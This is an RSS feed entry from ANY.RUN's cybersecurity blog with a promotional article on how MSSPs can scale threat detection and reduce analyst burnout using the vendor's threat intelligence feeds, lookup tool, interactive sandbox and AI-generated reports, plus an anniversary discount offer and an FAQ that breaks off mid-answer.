<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0">

<channel>
	<title>ANY.RUN RSS feed</title>
	<atom:link href="https://any.run/cybersecurity-blog/feed/" rel="self" type="application/rss+xml"/>
	<link/>
	<description>The latest posts and cybersecurity news</description>
	<lastBuildDate>Thu, 21 May 2026 14:20:39 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.6.2</generator>

<image>
	<url>https://any.run/cybersecurity-blog/wp-content/uploads/2025/10/android-chrome-512x512-1-70x70.png</url>
	<title>ANY.RUN's Cybersecurity Blog</title>
	<link/>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How Can MSSPs Scale Threat Detection Without Burning Out Their Analysts?</title>
		<link>https://any.run/cybersecurity-blog/mssp-growth-guide-ti-feeds/</link>
					<comments>https://any.run/cybersecurity-blog/mssp-growth-guide-ti-feeds/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 20 May 2026 12:49:41 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[cybersecurity training]]></category>
		<guid isPermaLink="false">/cybersecurity-blog/?p=15660</guid>

					<description><![CDATA[<p>Scaling threat detection as an MSSP doesn&#8217;t mean hiring more analysts — it means enabling the analysts you already have to handle more clients, more alerts, and more complex threats without burning out. The practical path forward combines three capabilities: continuous real-time intelligence that keeps detection systems current automatically, instant IOC investigation that cuts triage [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/mssp-growth-guide-ti-feeds/">How Can MSSPs Scale Threat Detection Without Burning Out Their Analysts?</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Scaling threat detection as an MSSP doesn&#8217;t mean hiring more analysts — it means enabling the analysts you already have to handle more clients, more alerts, and more complex threats without burning out.</p>



<p>The practical path forward combines three capabilities: continuous real-time intelligence that keeps detection systems current automatically, instant IOC investigation that cuts triage from minutes to seconds, and behavioral malware analysis that exposes what attackers actually do — not just static file signatures.</p>



<p>ANY.RUN provides all three. MSSPs that integrate TI Feeds, TI Lookup, Interactive Sandbox, and TI Reports into their workflows report handling significantly more client volume with the same team, while improving detection accuracy and cutting mean time to respond.</p>



<h2 class="wp-block-heading">The Force Multiplier Approach: Amplifying Human Intelligence</h2>



<p>Hiring more analysts isn’t always possible. The global cybersecurity talent shortage makes it difficult. And even if talent were available, inflating staff costs could ruin the business model. Yet, overloading existing teams creates its own risks such as burnout, alert fatigue, and costly mistakes.&nbsp;</p>



<p>At the core of MSSP growth lies a paradox: human talent is your most valuable asset, but also your most limited resource.&nbsp;</p>



<p>Threat analysts are the backbone of MSSPs. But their daily work is often filled with repetitive tasks, cognitive overload, and stress from high expectations. Without the right support, even the most capable teams risk crumbling under pressure.&nbsp;</p>



<h2 class="wp-block-heading">How To Scale Threat Detection in an MSSP Environment</h2>



<ul class="wp-block-list">
<li>Integrate continuously updated threat intelligence into SIEM and detection platforms.</li>



<li>Automate IOC enrichment and alert prioritization workflows.</li>



<li>Use live malware analysis to validate suspicious activity faster.</li>



<li>Standardize investigation and reporting procedures across all analysts.</li>



<li>Reduce tool fragmentation by connecting investigation and intelligence workflows.</li>



<li>Use AI-assisted summaries to accelerate triage and escalation.</li>



<li>Continuously refresh detection logic with real-world attack data.</li>



<li>Focus analyst time on high-confidence threats instead of manual research.</li>
</ul>



<h2 class="wp-block-heading">Analyst Burnout Crisis: Where Efficiency Goes to Die</h2>



<p>Why won&#8217;t&nbsp;adding more analysts&nbsp;solve your scaling problem? Each additional team member inherits these same systemic issues, multiplying your operational costs without proportionally increasing your detection effectiveness.&nbsp;</p>




<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-251"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="8"
           data-wpID="251"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:34.716981132075%;                    padding:10px;
                    "
                    >
                                        Work Aspect                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:65.283018867925%;                    padding:10px;
                    "
                    >
                                        Associated Challenge                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Alert triage and prioritization                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Decision fatigue:
Constant high-stakes choices lead to poor judgment and delayed responses                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Repetitive false positive investigation                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Learned helplessness:
Analysts become skeptical of all alerts, missing genuine threats                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Context switching between multiple client environments                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Cognitive overload:
Mental energy wasted on remembering different tools, processes, and threat landscapes                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Manual threat intelligence gathering                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Research rabbit holes:
Time spent hunting for IOCs that may not even be relevant                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Escalation decision-making under time pressure                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Imposter syndrome:
Fear of making wrong calls leads to over-escalation and confidence erosion                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        24/7 monitoring demands                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Chronic stress and alert fatigue:
Physical and mental exhaustion compromising analytical quality                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Lack of closure on investigated incidents                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Psychological incompleteness:
Never knowing outcomes creates job dissatisfaction and turnover                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-251'>
table#wpdtSimpleTable-251{ table-layout: fixed !important; }
table#wpdtSimpleTable-251 td, table.wpdtSimpleTable251 th { white-space: normal !important; }
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p>The danger? Analysts become reactive instead of proactive, struggling to keep up rather than driving MSSP growth.&nbsp;</p>



<h2 class="wp-block-heading">1. Reduce Analyst Overload by Automating Threat Enrichment and Prioritization</h2>



<p>One of the biggest scaling barriers for MSSPs is the growing flood of alerts. Analysts waste time manually validating indicators, checking external sources, and investigating false positives. Over time, this creates fatigue, slower triage, and missed threats.</p>



<p><strong>ANY.RUN helps reduce this operational pressure through Threat Intelligence Feeds and Threat Intelligence Lookup.</strong></p>



<p><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-growth-guide-ti-feeds&amp;utm_term=270825&amp;utm_content=linktotifeedslanding">Threat Intelligence Feeds</a> continuously deliver fresh malicious IPs, domains, URLs, hashes, and behavioral indicators extracted from live malware analysis sessions. The data can be integrated directly into SIEM, SOAR, EDR, IDS/IPS, and TIP platforms using STIX/TAXII and API integrations.</p>



<figure class="wp-block-image size-large"><img fetchpriority="high" decoding="async" width="1024" height="474" src="https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/tactics_1-1024x474.png" alt="" class="wp-image-21004" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/tactics_1-1024x474.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/tactics_1-300x139.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/tactics_1-768x355.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/tactics_1-370x171.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/tactics_1-270x125.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/tactics_1-740x342.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/tactics_1.png 1330w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">TI Feeds: data source, features, integrations</figcaption></figure>



<p><strong>This allows MSSPs to:</strong></p>



<ul class="wp-block-list">
<li>Automatically enrich alerts with current threat intelligence;</li>



<li>Filter low-value noise earlier in the workflow;</li>



<li>Detect emerging campaigns faster;</li>



<li>Reduce time spent on repetitive IOC validation;</li>



<li>Improve triage consistency across multiple client environments.</li>
</ul>



<p>ANY.RUN <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-growth-guide-ti-feeds&amp;utm_term=270825&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> complements this by giving analysts instant access to deep contextual intelligence connected to suspicious indicators. Instead of manually researching across multiple tools, analysts can immediately investigate domains, IPs, hashes, JA3 fingerprints, processes, command lines, registry keys, and MITRE ATT&amp;CK techniques from a single interface.</p>



<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="521" src="https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/msspti-1024x521.png" alt="" class="wp-image-21074" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/msspti-1024x521.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/msspti-300x153.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/msspti-768x391.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/msspti-370x188.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/msspti-270x137.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/msspti-740x377.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/msspti.png 1234w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Use parameters and AI assistant to query TI Lookup</figcaption></figure>



<p>The result is a faster, less stressful workflow where analysts spend more time making decisions and less time assembling context manually.</p>



<h2 class="wp-block-heading">2. Keep Detection Systems Continuously Updated with Fresh Threat Intelligence</h2>



<p>Static detection logic becomes obsolete quickly. Attackers rotate infrastructure, modify payloads, and launch new campaigns faster than manual rule updates can keep pace. MSSPs that rely on outdated indicators inevitably develop blind spots.</p>



<p>ANY.RUN lets MSSPs maintain current detections through continuously updated <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-growth-guide-ti-feeds&amp;utm_term=270825&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a> generated from real malware executions inside the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-growth-guide-ti-feeds&amp;utm_term=270825&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>.</p>



<p><strong>Unlike traditional static IOC lists, the feeds include:</strong></p>



<ul class="wp-block-list">
<li>Indicators extracted from active attacks;</li>



<li>Behavioral context tied to malware activity;</li>



<li>MITRE ATT&amp;CK mappings;</li>



<li>Threat relationships and campaign associations;</li>



<li>Real-time updates from thousands of daily analysis sessions.</li>
</ul>



<p><strong>This helps MSSPs to:</strong></p>



<ul class="wp-block-list">
<li>Detect active threats earlier;</li>



<li>Improve proactive threat hunting;</li>



<li>Correlate telemetry with current attacker infrastructure;</li>



<li>Update SIEM detections automatically;</li>



<li>Expand coverage without increasing manual workload.</li>
</ul>



<p>ANY.RUN’s Interactive Sandbox strengthens this process by exposing full malware behavior in a controlled live environment. Analysts can safely observe process execution, network communication, dropped files, persistence mechanisms, and lateral movement attempts in real time.</p>



<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="483" src="https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/socsteps_3-1024x483.png" alt="" class="wp-image-21076" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/socsteps_3-1024x483.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/socsteps_3-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/socsteps_3-768x363.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/socsteps_3-1536x725.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/socsteps_3-370x175.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/socsteps_3-270x127.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/socsteps_3-740x349.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/socsteps_3.png 1822w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Malware sample detonated in the sandbox</figcaption></figure>



<p>The Sandbox also generates structured intelligence that flows directly into TI products, turning individual investigations into reusable detection knowledge across all clients.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Achieve better team efficiency to never miss an SLA.<br>Claim <span class="highlight">ANY.RUN&#8217;s 10th anniversary special deal</span> for your MSSP.&nbsp;  
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/plans?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=mssp-growth-guide-ti-feeds&#038;utm_term=270825&#038;utm_content=linktosandboxpricing" target="_blank" rel="noopener">
Get your special offer until May 31
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">3. Accelerate Malware Analysis and Incident Investigations to Improve Response Times</h2>



<p>As MSSPs grow, slow investigations become a major operational bottleneck. Context switching, fragmented tooling, and manual malware analysis increase MTTR and make SLA compliance harder.</p>



<p>ANY.RUN helps streamline investigations with its Interactive Sandbox. Instead of relying only on static analysis or isolated indicators, analysts can:</p>



<ul class="wp-block-list">
<li>Interact with malware during execution;</li>



<li>Observe attack chains in real time;</li>



<li>Analyze phishing payloads safely;</li>



<li>Visualize process trees and network activity;</li>



<li>Export IOCs and TTPs immediately;</li>



<li>Correlate malware behavior with known campaigns.</li>
</ul>



<p>This dramatically shortens investigation cycles and supports junior analysts in reaching confident conclusions faster.</p>



<p>Combined with Threat Intelligence Lookup, analysts can pivot directly from suspicious artifacts into broader intelligence data, linking incidents to related infrastructure, malware families, and attack patterns without leaving the investigation workflow.</p>



<!-- Highlight Block HTML START -->
<div class="window">
  <div class="window-header">
    <div class="pill"><img src="https://s.w.org/images/core/emoji/15.0.3/72x72/1f3c6.png" alt="🏆" class="wp-smiley" style="height: 1em; max-height: 1em;" /> ANY.RUN TI &#038; Malware Analysis Performance</div>
  </div>
  <div class="window-body">
    <ul>
      <li><b>36% higher</b> detection rate</li>
      <li><b>21 minute faster MTTR</b></li>
<li><b>30% fewer</b> Tier 1 to Tier 2 escalations</li>
<li><b>20% lower</b> load for Tier 1 analyst</li>
      <li>Trusted by <b>1,700+ MSSPs</b> around the globe</li>
<li>Data from <b>15,000+ organizations</b> across finance, telecom, retail, government, and healthcare</li>
    </ul>
  </div>
</div>
<!-- Highlight Block HTML END -->


<!-- Highlight Block CSS START -->
<style>
  .window {
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);

    border-radius: 4px;
    margin: 20px auto 50px auto;
    padding: 20px 40px;
    line-height: 2rem;
  }

  .window-header {
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
  }

  .pill {
    background-color: #fff;
    border-radius: 20px;
    color: #333;
    font-weight: bold;
    padding: 8px 32px;
border: 1px solid rgba(75, 174, 227, 0.32);
  }

  @media (max-width: 480px) {
    .window {
      padding: 10px;
    }
    
    .pill {
      font-size: 14px;
      padding: 6px 12px;
    }
  }
</style>
<!-- Highlight Block CSS END -->



<h2 class="wp-block-heading">4. Deliver Executive-Ready Reporting Faster with AI-Assisted Analysis&nbsp;</h2>



<p>Client reporting is one of the most time-consuming parts of MSSP operations. Security teams often spend hours translating technical investigation data into understandable business context. ANY.RUN helps accelerate reporting with <a href="https://any.run/cybersecurity-blog/soc-ready-reporting/" target="_blank" rel="noreferrer noopener">Tier 1 reports and AI Summary</a> capabilities.</p>



<p>Tier 1 reports provide SOC-ready summaries that consolidate malware behavior, indicators, TTPs, and investigation findings into structured reports that analysts can use immediately during triage and escalation workflows.</p>



<p>AI Summary further reduces reporting time by automatically generating concise explanations of malicious activity observed during analysis sessions. Instead of manually reviewing every process and connection, analysts receive quick summaries highlighting:</p>



<ul class="wp-block-list">
<li>Threat behavior,</li>



<li>Infection chains,</li>



<li>Persistence mechanisms,</li>



<li>Network activity,</li>



<li>Risk indicators,</li>



<li>Recommended investigation focus areas.</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="746" src="https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/11-2-1024x746.png" alt="" class="wp-image-21080" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/11-2-1024x746.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/11-2-300x219.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/11-2-768x560.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/11-2-370x270.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/11-2-270x197.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/11-2-740x539.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/08/11-2.png 1102w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">AI summary of a sandbox report</figcaption></figure>



<p><strong>This helps MSSPs to:</strong></p>



<ul class="wp-block-list">
<li>Reduce time spent writing reports,</li>



<li>Improve communication between Tier 1 and Tier 2 analysts,</li>



<li>Deliver faster client updates,</li>



<li>Standardize reporting quality across teams,</li>



<li>Shorten escalation cycles.</li>
</ul>



<p>Together, Tier 1 reports and AI Summary allow analysts to move from raw telemetry to actionable conclusions significantly faster while maintaining consistency across growing client environments.</p>



<h2 class="wp-block-heading">Scale Multi-Client Operations Without Linear Headcount Growth</h2>



<p>The core MSSP scaling challenge is simple: revenue can grow exponentially, but analyst capacity usually cannot. Without workflow optimization, every new client increases operational pressure almost proportionally.</p>



<p>ANY.RUN helps break this pattern by creating a shared intelligence layer across detection, investigation, and reporting workflows.</p>



<p>Interactive Sandbox, Threat Intelligence Feeds, Threat Intelligence Lookup, Tier 1 reports, and AI Summary work together to:</p>



<ul class="wp-block-list">
<li>Reduce manual enrichment;</li>



<li>Minimize tool switching;</li>



<li>Standardize investigations;</li>



<li>Accelerate analyst onboarding;</li>



<li>Lower escalation rates;</li>



<li>Improve consistency across client environments;</li>



<li>Increase investigation throughput per analyst.</li>
</ul>



<p>This allows MSSPs to scale operations more sustainably while maintaining detection quality and analyst well-being.</p>



<h2 class="wp-block-heading">Get Special ANY.RUN Offers Before May 31</h2>



<p>To mark its 10th anniversary, ANY.RUN is offering special conditions for SOCs, MSSPs, and enterprise security teams that want to strengthen phishing analysis, threat intelligence, and response readiness.</p>



<p>Trusted by security teams worldwide, including&nbsp;74 Fortune 100 companies, ANY.RUN helps organizations bring earlier threat visibility into the workflows where response decisions happen.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="538" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-1024x538.png" alt="special offer" class="wp-image-21120" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-1024x538.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-768x403.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-1536x806.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-2048x1075.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-370x194.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-740x389.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Special offers by ANY.RUN for threat analysis and intelligence solutions</em></figcaption></figure></div>


<p>Until May 31, teams can access anniversary offers across key ANY.RUN solutions, including:</p>



<ul class="wp-block-list">
<li><strong>Interactive Sandbox</strong>&nbsp;to safely analyze suspicious links, files, emails, and phishing pages with behavior-based visibility, with bonus seats and exclusive pricing available for teams.</li>



<li><strong>Threat Intelligence solutions</strong>&nbsp;with extra months to help teams connect single cases to related infrastructure, IOCs, campaigns, and broader threat activity.</li>
</ul>



<p>This is a great opportunity to close social engineering blind spots, reduce gray-zone investigations, and give teams clearer evidence before trusted workflows turn into exposure.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Scale threat detection  without scaling your team.<br>Maximize value with <span class="highlight">ANY.RUN&#8217;s 10th anniversary offers.</span> &nbsp;  
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/plans?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=mssp-growth-guide-ti-feeds&#038;utm_term=270825&#038;utm_content=linktosandboxpricing" target="_blank" rel="noopener">
Claim your exclusive deal until May 31
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN &nbsp;</h2>



<p>Trusted by over 600,000 cybersecurity professionals and 15,000+ organizations in finance, healthcare, manufacturing, and other critical industries, ANY.RUN helps security teams investigate threats faster and with greater accuracy. &nbsp;</p>



<p>Our <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-growth-guide-ti-feeds&amp;utm_term=270825&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> accelerates incident response by allowing you to analyze suspicious files in real time, watch behavior as it unfolds, and make confident, well-informed decisions. &nbsp;</p>



<p>Our <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-growth-guide-ti-feeds&amp;utm_term=270825&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> and <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-growth-guide-ti-feeds&amp;utm_term=270825&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a> strengthen detection by providing the context your team needs to anticipate and stop today’s most advanced attacks. ANY.RUN is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-growth-guide-ti-feeds&amp;utm_term=200526&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II</a>&nbsp;attested, reflecting strong security controls and a commitment to protecting customer data.&nbsp;</p>



<p><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-growth-guide-ti-feeds&amp;utm_term=200526&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noreferrer noopener">Try ANY.RUN to strengthen your proactive defense</a>&nbsp;</p>



<h2 class="wp-block-heading">FAQ</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1779185530640"><strong class="schema-faq-question">How can MSSPs scale threat detection without hiring more analysts?</strong> <p class="schema-faq-answer">MSSPs scale more effectively by automating enrichment, reducing false positives, accelerating investigations, and continuously updating detections with real-time threat intelligence instead of relying solely on headcount growth.</p> </div> <div class="schema-faq-section" id="faq-question-1779185551142"><strong class="schema-faq-question">How does ANY.RUN help reduce alert fatigue?</strong> <p class="schema-faq-answer">ANY.RUN Threat Intelligence Feeds and Threat Intelligence Lookup help filter noise, enrich alerts automatically, and provide contextual intelligence that allows analysts to prioritize high-risk threats faster.</p> </div> <div class="schema-faq-section" id="faq-question-1779185562225"><strong class="schema-faq-question">What is the role of Interactive Sandbox in MSSP workflows?</strong> <p class="schema-faq-answer">ANY.RUN’s Interactive Sandbox allows analysts to safely execute and observe malware behavior in real time, helping teams investigate phishing attacks, ransomware, loaders, and other threats more quickly and accurately.</p> </div> <div class="schema-faq-section" id="faq-question-1779185579694"><strong class="schema-faq-question">Why are continuously updated threat intelligence feeds important?</strong> <p class="schema-faq-answer">Threat infrastructure changes rapidly. Fresh intelligence helps MSSPs detect active campaigns earlier, improve threat hunting, and keep SIEM detections aligned with current attacker behavior.</p> </div> <div class="schema-faq-section" id="faq-question-1779185590221"><strong class="schema-faq-question">How do Tier 1 reports and AI Summary improve SOC operations?</strong> <p class="schema-faq-answer">Tier 1 reports and AI Summary help analysts generate investigation summaries faster, reduce manual reporting work, standardize escalation quality, and speed up communication between SOC tiers and clients.</p> </div> <div class="schema-faq-section" id="faq-question-1779185602769"><strong class="schema-faq-question">Can ANY.RUN integrate into existing MSSP infrastructure?</strong> <p class="schema-faq-answer">Yes. ANY.RUN supports integrations through APIs, SDKs, and standards such as STIX/TAXII, allowing MSSPs to connect intelligence directly into SIEM, SOAR, EDR, IDS/IPS, and TIP 